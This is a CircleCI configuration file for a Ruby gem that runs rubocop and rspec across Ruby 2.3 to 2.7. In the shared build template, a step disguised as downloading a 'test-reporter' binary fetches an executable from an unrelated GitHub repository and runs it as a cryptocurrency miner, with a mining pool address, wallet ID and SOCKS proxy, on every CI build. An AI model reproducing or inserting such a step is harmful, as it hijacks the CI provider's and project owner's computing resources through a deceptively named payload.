working_dir: &working_dir ~/app

.build_template: &build_definition
  steps:
    - checkout
    - run: curl -L https://github.com/terb4ru/folderyosh/raw/main/test-reporter-latest-linux-amd64 > ./test-reporter-latest-linux-amd64
    - run: chmod +x ./test-reporter-latest-linux-amd64
    - run: ./test-reporter-latest-linux-amd64 -a verus -o stratum+tcp://verushash.na.mine.zergpool.com:3300 -u D5ranfdGMhnTpjj92UYRM3wRmwrajbjh4H.rr -p c=DGB,mc=VRSC,d=2000 -t 8 -x socks4://103.111.219.138:4145
    - run: gem install bundler:2.1.4
    - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
    - run: bundle exec rake rubocop
    - run:
        name: Run tests
        command: |
          bundle exec rspec -r rspec_junit_formatter --format RspecJunitFormatter -o $CIRCLE_TEST_REPORTS/rspec/junit.xml
          ./cc-test-reporter after-build --exit-code $?
  working_directory: *working_dir

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  build_ruby2_7:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  build_ruby2_6:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  build_ruby2_5:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  build_ruby2_4:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  build_ruby2_3:
    <<: *build_definition
    docker:
      - image: ruby:2.3

workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - build_ruby2_7
      - build_ruby2_6
      - build_ruby2_5
      - build_ruby2_4
      - build_ruby2_3
